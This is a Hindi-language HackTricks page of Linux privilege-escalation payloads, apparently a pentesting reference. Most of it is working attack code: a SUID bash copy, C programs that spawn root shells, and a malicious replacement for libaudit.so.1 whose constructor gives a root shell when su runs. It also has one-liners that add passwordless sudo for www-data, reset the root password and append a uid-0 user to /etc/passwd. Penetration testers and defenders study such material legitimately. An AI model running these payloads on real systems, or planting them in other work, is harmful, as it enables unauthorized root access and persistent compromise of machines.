hacktricks/linux-hardening/privilege-escalation/payloads-to-execute.md

8.5 KiB

पेलोड्स को निष्पादित करें

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

Bash

cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu

C

//gcc payload.c -o payload
int main(void){
setresuid(0, 0, 0); //Set as user suid user
system("/bin/sh");
return 0;
}
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}
// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
char *const paramList[10] = {"/bin/bash", "-p", NULL};
const int id = 1000;
setresuid(id, id, id);
execve(paramList[0], paramList, NULL);
return 0;
}

विशेषाधिकार बढ़ाने के लिए एक फ़ाइल को अधिलेखित करना

सामान्य फ़ाइलें

  • पासवर्ड के साथ उपयोगकर्ता जोड़ें /etc/passwd में
  • /etc/shadow में पासवर्ड बदलें
  • /etc/sudoers में sudoers में उपयोगकर्ता जोड़ें
  • Docker को दुरुपयोग करें docker सॉकेट के माध्यम से, सामान्यत: /run/docker.sock या /var/run/docker.sock में

एक पुस्तकालय को अधिलेखित करना

कुछ बाइनरी द्वारा उपयोग की जाने वाली एक पुस्तकालय की जांच करें, इस मामले में /bin/su:

ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)

इस मामले में हम /lib/x86_64-linux-gnu/libaudit.so.1 का अनुकरण करने का प्रयास करें।
इसलिए, इस पुस्तकालय द्वारा उपयोग की जाने वाली su बाइनरी के फ़ंक्शन की जांच करें:

objdump -T /bin/su | grep audit
0000000000000000      DF *UND*  0000000000000000              audit_open
0000000000000000      DF *UND*  0000000000000000              audit_log_user_message
0000000000000000      DF *UND*  0000000000000000              audit_log_acct_message
000000000020e968 g    DO .bss   0000000000000004  Base        audit_fd

चिह्न audit_open, audit_log_acct_message, audit_log_acct_message और audit_fd संभावित रूप से libaudit.so.1 पुस्तकालय से हैं। libaudit.so.1 को दुर्भाग्यपूर्ण साझा पुस्तकालय द्वारा अधिलिखित किया जाएगा, इन चिह्नों को नए साझा पुस्तकालय में मौजूद होना चाहिए, अन्यथा कार्यक्रम चिह्न को नहीं ढूंढ पाएगा और बाहर निकल जाएगा।

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c

int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;

void inject()__attribute__((constructor));

void inject()
{
setuid(0);
setgid(0);
system("/bin/bash");
}

अब, बस /bin/su को कॉल करके आप रूट के रूप में शैल प्राप्त करेंगे।

स्क्रिप्ट

क्या आप रूट को कुछ एक्सीक्यूट करने के लिए बना सकते हैं?

www-data से सुडोर्स

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

रूट पासवर्ड बदलें

echo "root:hacked" | chpasswd

/etc/passwd में नए रूट उपयोगकर्ता जोड़ें

echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!